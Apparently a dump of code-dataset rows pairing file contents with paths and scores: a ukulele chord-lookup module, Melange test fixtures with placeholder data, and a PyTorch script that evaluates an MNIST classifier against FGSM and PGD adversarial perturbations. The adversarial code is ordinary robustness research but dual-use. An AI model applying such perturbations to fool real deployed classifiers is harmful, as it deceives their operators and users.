'F7' : (2, 3, 1, 0),
'Fm' : (1, 0, 1, 3),
'Fm7' : (1, 3, 1, 3),
'Fdim' : (1, 2, 1, 2),
'Faug' : (2, 1, 1, 0),
'F6' : (2, 2, 1, 3),
'Fmaj7' : (2, 4, 1, 3),
'F9' : (2, 3, 3, 3),
'F#' : (3, 1, 2, 1),
'F#7' : (3, 4, 2, 4),
'F#m' : (2, 1, 2, 0),
'F#m7' : (2, 4, 2, 4),
'F#dim' : (2, 3, 2, 3),
'F#aug' : (4, 3, 2, 2),
'F#6' : (3, 3, 2, 4),
'F#maj7' : (0, 1, 1, 1),
'F#9' : (1, 1, 0, 1),
'G' : (0, 2, 3, 2),
'G7' : (0, 2, 1, 2),
'Gm' : (0, 2, 3, 1),
'Gm7' : (0, 2, 1, 1),
'Gdim' : (0, 1, 0, 1),
'Gaug' : (4, 3, 3, 2),
'G6' : (0, 2, 0, 2),
'Gmaj7' : (0, 2, 2, 2),
'G9' : (2, 2, 1, 2),
'G#' : (5, 3, 4, 3),
'G#7' : (1, 3, 2, 3),
'G#m' : (1, 3, 4, 2),
'G#m7' : (0, 3, 2, 2),
'G#dim' : (1, 2, 1, 2),
'G#aug' : (1, 0, 0, 2),
'G#6' : (1, 3, 1, 3),
'G#maj7' : (1, 3, 3, 3),
'G#9' : (3, 3, 2, 3),
'A' : (2, 1, 0, 0),
'A7' : (0, 1, 0, 0),
'Am' : (2, 0, 0, 0),
'Am7' : (0, 4, 3, 3),
'Adim' : (2, 3, 2, 3),
'Aaug' : (2, 1, 1, 1),
'A6' : (2, 4, 2, 4),
'Amaj7' : (1, 1, 0, 0),
'A9' : (0, 1, 0, 2),
'Bb' : (3, 2, 1, 1),
'Bb7' : (1, 2, 1, 1),
'Bbm' : (3, 1, 1, 1),
'Bbm7' : (1, 1, 1, 1),
'Bbdim' : (0, 1, 0, 1),
'Bbaug' : (3, 2, 2, 1),
'Bb6' : (0, 2, 1, 1),
'Bbmaj7': (3, 2, 1, 0),
'Bb9' : (1, 2, 1, 3),
'B' : (4, 3, 2, 2),
'B7' : (2, 3, 2, 2),
'Bm' : (4, 2, 2, 2),
'Bm7' : (2, 2, 2, 2),
'Bdim' : (1, 2, 1, 2),
'Baug' : (4, 3, 3, 2),
'B6' : (1, 3, 2, 2),
'Bmaj7' : (3, 3, 2, 2),
'B9' : (2, 3, 2, 4),
}
CHORDS = dict()
for chord in CHORD_TABS :
CHORDS[chord] = get_chord(chord) | psox/ukulele.py |
__all__ = [
'CHORDS', 'CHORD_TABS',
'UkuleleNoteError', 'UkuleleChordError',
'get_chord', 'get_note'
]
class UkuleleNoteError(Exception) :
pass
class UkuleleChordError(Exception) :
pass
def get_note(string, fret) :
if abs(string) < len(FRETS) :
if abs(fret) < len(FRETS[string]) :
return FRETS[string][fret]
raise UkuleleNoteError(string, fret)
def get_chord(chord) :
if chord in CHORD_TABS :
return tuple([
get_note(string, fret) for string, fret in enumerate(CHORD_TABS[chord])
])
raise UkuleleChordError(chord)
FRETS = (
('G4', 'G#4', 'A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5', 'F5', 'F#5', 'G5'),
('C4', 'C#4', 'D4', 'D#4', 'E4', 'F4', 'F#4', 'G4', 'G#4', 'A4', 'A#4', 'B4', 'C5'),
('E4', 'F4', 'F#4', 'G4', 'G#4', 'A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5'),
('A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5', 'F5', 'F#5', 'G5', 'G#5', 'A5'),
)
CHORD_TABS = {
'C' : (0, 0, 0, 3),
'C7' : (0, 0, 0, 1),
'Cm' : (0, 3, 3, 3),
'Cm7' : (3, 3, 3, 3),
'Cdim' : (2, 3, 2, 3),
'Caug' : (1, 0, 0, 3),
'C6' : (0, 0, 0, 0),
'Cmaj7' : (0, 0, 0, 2),
'C9' : (0, 2, 0, 1),
'C#' : (1, 1, 1, 4),
'C#7' : (1, 1, 1, 2),
'C#m' : (1, 1, 0, 3),
'C#m7' : (4, 4, 4, 4),
'C#dim' : (0, 1, 0, 1),
'C#aug' : (2, 1, 1, 0),
'C#6' : (1, 1, 1, 1),
'C#maj7' : (1, 1, 1, 3),
'C#9' : (1, 3, 1, 2),
'D' : (2, 2, 2, 0),
'D7' : (2, 2, 2, 3),
'Dm' : (2, 2, 1, 0),
'Dm7' : (2, 2, 1, 3),
'Ddim' : (1, 2, 1, 2),
'Daug' : (3, 2, 2, 1),
'D6' : (2, 2, 2, 2),
'Dmaj7' : (2, 2, 2, 4),
'D9' : (2, 4, 2, 3),
'Eb' : (1, 3, 3, 3),
'Eb7' : (3, 3, 3, 4),
'Ebm' : (3, 3, 2, 1),
'Ebm7' : (3, 3, 2, 4),
'Ebdim' : (2, 3, 2, 3),
'Ebaug' : (2, 1, 1, 4),
'Eb6' : (3, 3, 3, 3),
'Ebmaj7' : (3, 3, 3, 0),
'Eb9' : (0, 1, 1, 1),
'E' : (2, 4, 4, 4),
'E7' : (1, 2, 0, 2),
'Em' : (0, 4, 3, 2),
'Em7' : (0, 2, 0, 2),
'Edim' : (0, 1, 0, 1),
'Eaug' : (1, 0, 0, 3),
'E6' : (1, 0, 2, 0),
'Emaj7' : (1, 3, 0, 2),
'E9' : (1, 2, 2, 2),
'F' : (2, 0, 1, 0),
'F7' : (2, 3, 1, 0),
'Fm' : (1, 0, 1, 3),
'Fm7' : (1, 3, 1, 3),
'Fdim' : (1, 2, 1, 2),
'Faug' : (2, 1, 1, 0),
'F6' : (2, 2, 1, 3),
'Fmaj7' : (2, 4, 1, 3),
'F9' : (2, 3, 3, 3),
'F#' : (3, 1, 2, 1),
'F#7' : (3, 4, 2, 4),
'F#m' : (2, 1, 2, 0),
'F#m7' : (2, 4, 2, 4),
'F#dim' : (2, 3, 2, 3),
'F#aug' : (4, 3, 2, 2),
'F#6' : (3, 3, 2, 4),
'F#maj7' : (0, 1, 1, 1),
'F#9' : (1, 1, 0, 1),
'G' : (0, 2, 3, 2),
'G7' : (0, 2, 1, 2),
'Gm' : (0, 2, 3, 1),
'Gm7' : (0, 2, 1, 1),
'Gdim' : (0, 1, 0, 1),
'Gaug' : (4, 3, 3, 2),
'G6' : (0, 2, 0, 2),
'Gmaj7' : (0, 2, 2, 2),
'G9' : (2, 2, 1, 2),
'G#' : (5, 3, 4, 3),
'G#7' : (1, 3, 2, 3),
'G#m' : (1, 3, 4, 2),
'G#m7' : (0, 3, 2, 2),
'G#dim' : (1, 2, 1, 2),
'G#aug' : (1, 0, 0, 2),
'G#6' : (1, 3, 1, 3),
'G#maj7' : (1, 3, 3, 3),
'G#9' : (3, 3, 2, 3),
'A' : (2, 1, 0, 0),
'A7' : (0, 1, 0, 0),
'Am' : (2, 0, 0, 0),
'Am7' : (0, 4, 3, 3),
'Adim' : (2, 3, 2, 3),
'Aaug' : (2, 1, 1, 1),
'A6' : (2, 4, 2, 4),
'Amaj7' : (1, 1, 0, 0),
'A9' : (0, 1, 0, 2),
'Bb' : (3, 2, 1, 1),
'Bb7' : (1, 2, 1, 1),
'Bbm' : (3, 1, 1, 1),
'Bbm7' : (1, 1, 1, 1),
'Bbdim' : (0, 1, 0, 1),
'Bbaug' : (3, 2, 2, 1),
'Bb6' : (0, 2, 1, 1),
'Bbmaj7': (3, 2, 1, 0),
'Bb9' : (1, 2, 1, 3),
'B' : (4, 3, 2, 2),
'B7' : (2, 3, 2, 2),
'Bm' : (4, 2, 2, 2),
'Bm7' : (2, 2, 2, 2),
'Bdim' : (1, 2, 1, 2),
'Baug' : (4, 3, 3, 2),
'B6' : (1, 3, 2, 2),
'Bmaj7' : (3, 3, 2, 2),
'B9' : (2, 3, 2, 4),
}
CHORDS = dict()
for chord in CHORD_TABS :
CHORDS[chord] = get_chord(chord) | 0.361052 | 0.325789 |
__authors__ = [
'"Madhusudan.C.S" <<EMAIL>>',
]
from datetime import datetime
from datetime import timedelta
from google.appengine.ext import db
from google.appengine.api import users
from fixture import DataSet
class UserData(DataSet):
class all_admin:
key_name = '<EMAIL>'
link_id = 'super_admin'
account = users.User(email='<EMAIL>')
name = 'Super Admin'
is_developer = True
class site_admin:
key_name = 'site_admin'
link_id = 'site_admin'
account = users.User(email='<EMAIL>')
name = 'Site Admin'
class melange_admin_0001:
key_name = 'melange_admin_0001'
link_id = 'melange_admin_0001'
account = users.User(email='<EMAIL>')
name = 'Melange Admin 0001'
class melange_admin_0002:
key_name = 'melange_admin_0002'
link_id = 'melange_admin_0002'
account = users.User(email='<EMAIL>')
name = 'Melange Admin 0002'
class asf_admin_0001:
key_name = 'asf_admin_0001'
link_id = 'asf_admin_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Admin 0001'
class melange_mentor_0001:
key_name = 'melange_mentor_0001'
link_id = 'melange_mentor_0001'
account = users.User(email='<EMAIL>')
name = '<NAME>or 0001'
class melange_mentor_0002:
key_name = 'melange_mentor_0002'
link_id = 'melange_mentor_0002'
account = users.User(email='<EMAIL>')
name = '<NAME> 0002'
class asf_mentor_0001:
key_name = 'asf_mentor_0001'
link_id = 'asf_mentor_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Mentor 001'
class melange_student_0001:
key_name = 'melange_student_0001'
link_id = 'melange_student_0001'
account = users.User(email='<EMAIL>')
name = 'Melange Student 0001'
class melange_student_0002:
key_name = 'melange_student_0002'
link_id = 'melange_student_0002'
account = users.User(email='<EMAIL>')
name = 'Melange Student 0002'
class asf_student_0001:
key_name = 'asf_student_0001'
link_id = 'asf_student_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Student 0001'
class public:
key_name = 'public'
link_id = 'public'
account = users.User(email='<EMAIL>')
name = 'Public'
class SiteData(DataSet):
class site:
key_name = 'site'
link_id = 'site'
class SponsorData(DataSet):
class google:
key_name = 'google'
link_id = 'google'
name = 'Google Inc.'
short_name = 'Google'
founder = UserData.site_admin
home_page = 'http://www.google.com'
email = '<EMAIL>'
description = 'This is the profile for Google.'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class HostData(DataSet):
class google:
key_name = 'google/test'
link_id = 'test'
scope = SponsorData.google
scope_path = 'google'
user = UserData.site_admin
given_name = 'Test'
surname = 'Example'
name_on_documents = '<NAME>'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class TimelineData(DataSet):
class gsoc2009:
key_name = 'google/gsoc2009'
link_id = 'gsoc2009'
scope_path = 'google'
scope = SponsorData.google
class GHOPTimelineData(DataSet):
class ghop2009:
key_name = 'google/ghop2009'
link_id = 'ghop2009'
scope_path = 'google'
scope = SponsorData.google
program_start = datetime.today() - timedelta(days=30)
program_end = datetime.today() + timedelta(days=30)
org_signup_start = datetime.today() + timedelta(days=25)
org_signup_end = datetime.today() + timedelta(days=25)
class ProgramData(DataSet):
class gsoc2009:
key_name = 'google/gsoc2009'
link_id = 'gsoc2009'
scope_path ='google'
scope = SponsorData.google
name = 'Google Summer of Code 2009'
short_name = 'GSoC 2009'
group_label = 'GSOC'
description = 'This is the program for GSoC 2009.'
apps_tasks_limit = 42
slots = 42
timeline = TimelineData.gsoc2009
status = 'visible'
class GHOPProgramData(DataSet):
class ghop2009:
key_name = 'google/ghop2009'
link_id = 'ghop2009'
scope_path ='google'
scope = SponsorData.google
name = 'Google Highly Open Participation Contest 2009'
short_name = 'GHOP 2009'
group_label = 'GHOP'
description = 'This is the program for GHOP 2009.'
apps_tasks_limit = 42
slots = 42
timeline = GHOPTimelineData.ghop2009
status = 'visible'
class OrgData(DataSet):
class melange_gsoc:
key_name = 'google/ghop2009/melange'
link_id = 'melange'
name = '<NAME>'
short_name = 'Melange'
scope_path = 'google/gsoc2009'
scope = ProgramData.gsoc2009
home_page = 'http://code.google.com/p/soc'
description = 'Melange, share the love!'
license_name = 'Apache License'
ideas = 'http://code.google.com/p/soc/issues'
founder = UserData.melange_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class GHOPOrganizationData(DataSet):
class melange_ghop:
key_name = 'google/ghop2009/melange'
link_id = 'melange'
name = 'Melange Development Team'
short_name = 'Melange'
scope_path = 'google/ghop2009'
scope = GHOPProgramData.ghop2009
home_page = 'http://code.google.com/p/soc'
description = 'Melange, share the love!'
license_name = 'Apache License'
ideas = 'http://code.google.com/p/soc/issues'
founder = UserData.melange_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
task_quota_limit = 100
class asf_ghop:
key_name = 'google/ghop2009/asf'
link_id = 'asf'
name = 'ASF Development Team'
short_name = 'ASF'
scope_path = 'google/ghop2009'
scope = GHOPProgramData.ghop2009
home_page = 'http://apache.org'
description = 'Apache Software Foundation'
license_name = 'Apache License'
ideas = 'http://apache.org/ideas'
founder = UserData.asf_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class GHOPOrgAdminData(DataSet):
class melange:
key_name = 'google/ghop2009/melange/test'
link_id = 'test'
scope_path = 'google/ghop2009/melange'
scope = GHOPOrganizationData.melange_ghop
program = GHOPProgramData.ghop2009
user = UserData.melange_admin_0001
given_name = 'Test'
surname = 'Example'
name_on_documents = 'Test Example'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class GHOPMentorData(DataSet):
class melange:
key_name = 'google/ghop2009/melange/test'
link_id = 'test'
scope_path = 'google/ghop2009/melange'
scope = GHOPOrganizationData.melange_ghop
program = GHOPProgramData.ghop2009
user = UserData.melange_mentor_0001
given_name = 'Test'
surname = 'Example'
name_on_documents = 'Test Example'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class GHOPStudentData(DataSet):
class melange_student_0001:
student_id = 'melange_student_0001'
key_name = GHOPProgramData.ghop2009.key_name + "/" + student_id
link_id = student_id
scope_path = GHOPProgramData.ghop2009.key_name
scope = GHOPProgramData.ghop2009
program = GHOPProgramData.ghop2009
user = UserData.melange_student_0001
given_name = 'Melange_Student'
surname = 'Melfam'
birth_date = db.DateProperty.now()
email = '<EMAIL>'
im_handle = 'melange_student_0001'
major = 'Aerospace Engineering'
name_on_documents = 'melstud0001'
res_country = 'United States'
res_city = 'Minnesota'
res_street = 'Good Street'
res_postalcode = '12345'
publish_location = True
blog = 'http://www.blog.com/'
home_page = 'http://www.homepage.com/'
photo_url = 'http://www.photosite.com/thumbnail.png'
ship_state = None
expected_graduation = 2009
school_country = 'United States'
school_name = 'St.Joseph School'
tshirt_size = 'XS'
tshirt_style = 'male'
degree = 'Undergraduate'
phone = '1650253000'
can_we_contact_you = True
program_knowledge = 'I heard about this program through a friend.'
class asf_student_0001:
student_id = 'asf_student_0001'
key_name = GHOPProgramData.ghop2009.key_name + "/" + student_id
link_id = student_id
scope_path = GHOPProgramData.ghop2009.key_name
scope = GHOPProgramData.ghop2009
program = GHOPProgramData.ghop2009
user = UserData.melange_student_0001
given_name = 'ASF_Student'
surname = 'Asffam'
birth_date = db.DateProperty.now()
email = '<EMAIL>'
im_handle = 'asf_student_0001'
major = 'Chemical Engineering'
name_on_documents = 'asfstud0001'
res_country = 'United States'
res_city = 'New York'
res_street = 'Jam Street'
res_postalcode = '452543'
publish_location = True
blog = 'http://www.hasblog.com/'
home_page = 'http://www.merahomepage.com/'
photo_url = 'http://www.clickphoto.com/thumbnail.png'
ship_state = None
expected_graduation = 2009
school_country = 'United States'
school_name = 'Benedict School'
tshirt_size = 'XXL'
tshirt_style = 'male'
degree = 'Undergraduate'
phone = '1650253000'
can_we_contact_you = True
program_knowledge = 'From slashdot.org post last year.' | src/melange/src/tests/datasets.py | __authors__ = [
'"Madhusudan.C.S" <<EMAIL>>',
]
from datetime import datetime
from datetime import timedelta
from google.appengine.ext import db
from google.appengine.api import users
from fixture import DataSet
class UserData(DataSet):
class all_admin:
key_name = '<EMAIL>'
link_id = 'super_admin'
account = users.User(email='<EMAIL>')
name = 'Super Admin'
is_developer = True
class site_admin:
key_name = 'site_admin'
link_id = 'site_admin'
account = users.User(email='<EMAIL>')
name = 'Site Admin'
class melange_admin_0001:
key_name = 'melange_admin_0001'
link_id = 'melange_admin_0001'
account = users.User(email='<EMAIL>')
name = 'Melange Admin 0001'
class melange_admin_0002:
key_name = 'melange_admin_0002'
link_id = 'melange_admin_0002'
account = users.User(email='<EMAIL>')
name = 'Melange Admin 0002'
class asf_admin_0001:
key_name = 'asf_admin_0001'
link_id = 'asf_admin_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Admin 0001'
class melange_mentor_0001:
key_name = 'melange_mentor_0001'
link_id = 'melange_mentor_0001'
account = users.User(email='<EMAIL>')
name = '<NAME>or 0001'
class melange_mentor_0002:
key_name = 'melange_mentor_0002'
link_id = 'melange_mentor_0002'
account = users.User(email='<EMAIL>')
name = '<NAME> 0002'
class asf_mentor_0001:
key_name = 'asf_mentor_0001'
link_id = 'asf_mentor_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Mentor 001'
class melange_student_0001:
key_name = 'melange_student_0001'
link_id = 'melange_student_0001'
account = users.User(email='<EMAIL>')
name = 'Melange Student 0001'
class melange_student_0002:
key_name = 'melange_student_0002'
link_id = 'melange_student_0002'
account = users.User(email='<EMAIL>')
name = 'Melange Student 0002'
class asf_student_0001:
key_name = 'asf_student_0001'
link_id = 'asf_student_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Student 0001'
class public:
key_name = 'public'
link_id = 'public'
account = users.User(email='<EMAIL>')
name = 'Public'
class SiteData(DataSet):
class site:
key_name = 'site'
link_id = 'site'
class SponsorData(DataSet):
class google:
key_name = 'google'
link_id = 'google'
name = 'Google Inc.'
short_name = 'Google'
founder = UserData.site_admin
home_page = 'http://www.google.com'
email = '<EMAIL>'
description = 'This is the profile for Google.'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class HostData(DataSet):
class google:
key_name = 'google/test'
link_id = 'test'
scope = SponsorData.google
scope_path = 'google'
user = UserData.site_admin
given_name = 'Test'
surname = 'Example'
name_on_documents = '<NAME>'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class TimelineData(DataSet):
class gsoc2009:
key_name = 'google/gsoc2009'
link_id = 'gsoc2009'
scope_path = 'google'
scope = SponsorData.google
class GHOPTimelineData(DataSet):
class ghop2009:
key_name = 'google/ghop2009'
link_id = 'ghop2009'
scope_path = 'google'
scope = SponsorData.google
program_start = datetime.today() - timedelta(days=30)
program_end = datetime.today() + timedelta(days=30)
org_signup_start = datetime.today() + timedelta(days=25)
org_signup_end = datetime.today() + timedelta(days=25)
class ProgramData(DataSet):
class gsoc2009:
key_name = 'google/gsoc2009'
link_id = 'gsoc2009'
scope_path ='google'
scope = SponsorData.google
name = 'Google Summer of Code 2009'
short_name = 'GSoC 2009'
group_label = 'GSOC'
description = 'This is the program for GSoC 2009.'
apps_tasks_limit = 42
slots = 42
timeline = TimelineData.gsoc2009
status = 'visible'
class GHOPProgramData(DataSet):
class ghop2009:
key_name = 'google/ghop2009'
link_id = 'ghop2009'
scope_path ='google'
scope = SponsorData.google
name = 'Google Highly Open Participation Contest 2009'
short_name = 'GHOP 2009'
group_label = 'GHOP'
description = 'This is the program for GHOP 2009.'
apps_tasks_limit = 42
slots = 42
timeline = GHOPTimelineData.ghop2009
status = 'visible'
class OrgData(DataSet):
class melange_gsoc:
key_name = 'google/ghop2009/melange'
link_id = 'melange'
name = '<NAME>'
short_name = 'Melange'
scope_path = 'google/gsoc2009'
scope = ProgramData.gsoc2009
home_page = 'http://code.google.com/p/soc'
description = 'Melange, share the love!'
license_name = 'Apache License'
ideas = 'http://code.google.com/p/soc/issues'
founder = UserData.melange_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class GHOPOrganizationData(DataSet):
class melange_ghop:
key_name = 'google/ghop2009/melange'
link_id = 'melange'
name = 'Melange Development Team'
short_name = 'Melange'
scope_path = 'google/ghop2009'
scope = GHOPProgramData.ghop2009
home_page = 'http://code.google.com/p/soc'
description = 'Melange, share the love!'
license_name = 'Apache License'
ideas = 'http://code.google.com/p/soc/issues'
founder = UserData.melange_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
task_quota_limit = 100
class asf_ghop:
key_name = 'google/ghop2009/asf'
link_id = 'asf'
name = 'ASF Development Team'
short_name = 'ASF'
scope_path = 'google/ghop2009'
scope = GHOPProgramData.ghop2009
home_page = 'http://apache.org'
description = 'Apache Software Foundation'
license_name = 'Apache License'
ideas = 'http://apache.org/ideas'
founder = UserData.asf_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class GHOPOrgAdminData(DataSet):
class melange:
key_name = 'google/ghop2009/melange/test'
link_id = 'test'
scope_path = 'google/ghop2009/melange'
scope = GHOPOrganizationData.melange_ghop
program = GHOPProgramData.ghop2009
user = UserData.melange_admin_0001
given_name = 'Test'
surname = 'Example'
name_on_documents = 'Test Example'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class GHOPMentorData(DataSet):
class melange:
key_name = 'google/ghop2009/melange/test'
link_id = 'test'
scope_path = 'google/ghop2009/melange'
scope = GHOPOrganizationData.melange_ghop
program = GHOPProgramData.ghop2009
user = UserData.melange_mentor_0001
given_name = 'Test'
surname = 'Example'
name_on_documents = 'Test Example'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class GHOPStudentData(DataSet):
class melange_student_0001:
student_id = 'melange_student_0001'
key_name = GHOPProgramData.ghop2009.key_name + "/" + student_id
link_id = student_id
scope_path = GHOPProgramData.ghop2009.key_name
scope = GHOPProgramData.ghop2009
program = GHOPProgramData.ghop2009
user = UserData.melange_student_0001
given_name = 'Melange_Student'
surname = 'Melfam'
birth_date = db.DateProperty.now()
email = '<EMAIL>'
im_handle = 'melange_student_0001'
major = 'Aerospace Engineering'
name_on_documents = 'melstud0001'
res_country = 'United States'
res_city = 'Minnesota'
res_street = 'Good Street'
res_postalcode = '12345'
publish_location = True
blog = 'http://www.blog.com/'
home_page = 'http://www.homepage.com/'
photo_url = 'http://www.photosite.com/thumbnail.png'
ship_state = None
expected_graduation = 2009
school_country = 'United States'
school_name = 'St.Joseph School'
tshirt_size = 'XS'
tshirt_style = 'male'
degree = 'Undergraduate'
phone = '1650253000'
can_we_contact_you = True
program_knowledge = 'I heard about this program through a friend.'
class asf_student_0001:
student_id = 'asf_student_0001'
key_name = GHOPProgramData.ghop2009.key_name + "/" + student_id
link_id = student_id
scope_path = GHOPProgramData.ghop2009.key_name
scope = GHOPProgramData.ghop2009
program = GHOPProgramData.ghop2009
user = UserData.melange_student_0001
given_name = 'ASF_Student'
surname = 'Asffam'
birth_date = db.DateProperty.now()
email = '<EMAIL>'
im_handle = 'asf_student_0001'
major = 'Chemical Engineering'
name_on_documents = 'asfstud0001'
res_country = 'United States'
res_city = 'New York'
res_street = 'Jam Street'
res_postalcode = '452543'
publish_location = True
blog = 'http://www.hasblog.com/'
home_page = 'http://www.merahomepage.com/'
photo_url = 'http://www.clickphoto.com/thumbnail.png'
ship_state = None
expected_graduation = 2009
school_country = 'United States'
school_name = 'Benedict School'
tshirt_size = 'XXL'
tshirt_style = 'male'
degree = 'Undergraduate'
phone = '1650253000'
can_we_contact_you = True
program_knowledge = 'From slashdot.org post last year.' | 0.336658 | 0.0745 |
import argparse
import logging
import sys
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
from mnist_net import mnist_net
logger = logging.getLogger(__name__)
logging.basicConfig(
format='[%(asctime)s %(filename)s %(name)s %(levelname)s] - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.DEBUG)
def clamp(X, lower_limit, upper_limit):
return torch.max(torch.min(X, upper_limit), lower_limit)
def attack_fgsm(model, X, y, epsilon):
delta = torch.zeros_like(X, requires_grad=True)
output = model(X + delta)
loss = F.cross_entropy(output, y)
loss.backward()
grad = delta.grad.detach()
delta.data = epsilon * torch.sign(grad)
return delta.detach()
def attack_pgd(model, X, y, epsilon, alpha, attack_iters, restarts):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
for _ in range(restarts):
delta = torch.zeros_like(X).uniform_(-epsilon, epsilon).cuda()
delta.data = clamp(delta, 0-X, 1-X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] == y)[0]
if len(index) == 0:
break
loss = F.cross_entropy(output, y)
loss.backward()
grad = delta.grad.detach()
d = torch.clamp(delta + alpha * torch.sign(grad), -epsilon, epsilon)
d = clamp(d, 0-X, 1-X)
delta.data[index] = d[index]
delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), y, reduction='none')
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--batch-size', default=100, type=int)
parser.add_argument('--data-dir', default='../mnist-data', type=str)
parser.add_argument('--fname', type=str)
parser.add_argument('--attack', default='pgd', type=str, choices=['pgd', 'fgsm', 'none'])
parser.add_argument('--epsilon', default=0.3, type=float)
parser.add_argument('--attack-iters', default=50, type=int)
parser.add_argument('--alpha', default=1e-2, type=float)
parser.add_argument('--restarts', default=10, type=int)
parser.add_argument('--seed', default=0, type=int)
return parser.parse_args()
def main():
args = get_args()
logger.info(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
mnist_test = datasets.MNIST("../mnist-data", train=False, download=True, transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(mnist_test, batch_size=args.batch_size, shuffle=False)
model = mnist_net().cuda()
checkpoint = torch.load(args.fname)
model.load_state_dict(checkpoint)
model.eval()
total_loss = 0
total_acc = 0
n = 0
if args.attack == 'none':
with torch.no_grad():
for i, (X, y) in enumerate(test_loader):
X, y = X.cuda(), y.cuda()
output = model(X)
loss = F.cross_entropy(output, y)
total_loss += loss.item() * y.size(0)
total_acc += (output.max(1)[1] == y).sum().item()
n += y.size(0)
else:
for i, (X, y) in enumerate(test_loader):
X, y = X.cuda(), y.cuda()
if args.attack == 'pgd':
delta = attack_pgd(model, X, y, args.epsilon, args.alpha, args.attack_iters, args.restarts)
elif args.attack == 'fgsm':
delta = attack_fgsm(model, X, y, args.epsilon)
with torch.no_grad():
output = model(X + delta)
loss = F.cross_entropy(output, y)
total_loss += loss.item() * y.size(0)
total_acc += (output.max(1)[1] == y).sum().item()
n += y.size(0)
logger.info('Test Loss: %.4f, Acc: %.4f', total_loss/n, total_acc/n)
if __name__ == "__main__":
main() | pytorch_ares/third_party/fast_adversarial/MNIST/evaluate_mnist.py | import argparse
import logging
import sys
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
from mnist_net import mnist_net
logger = logging.getLogger(__name__)
logging.basicConfig(
format='[%(asctime)s %(filename)s %(name)s %(levelname)s] - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.DEBUG)
def clamp(X, lower_limit, upper_limit):
return torch.max(torch.min(X, upper_limit), lower_limit)
def attack_fgsm(model, X, y, epsilon):
delta = torch.zeros_like(X, requires_grad=True)
output = model(X + delta)
loss = F.cross_entropy(output, y)
loss.backward()
grad = delta.grad.detach()
delta.data = epsilon * torch.sign(grad)
return delta.detach()
def attack_pgd(model, X, y, epsilon, alpha, attack_iters, restarts):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
for _ in range(restarts):
delta = torch.zeros_like(X).uniform_(-epsilon, epsilon).cuda()
delta.data = clamp(delta, 0-X, 1-X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] == y)[0]
if len(index) == 0:
break
loss = F.cross_entropy(output, y)
loss.backward()
grad = delta.grad.detach()
d = torch.clamp(delta + alpha * torch.sign(grad), -epsilon, epsilon)
d = clamp(d, 0-X, 1-X)
delta.data[index] = d[index]
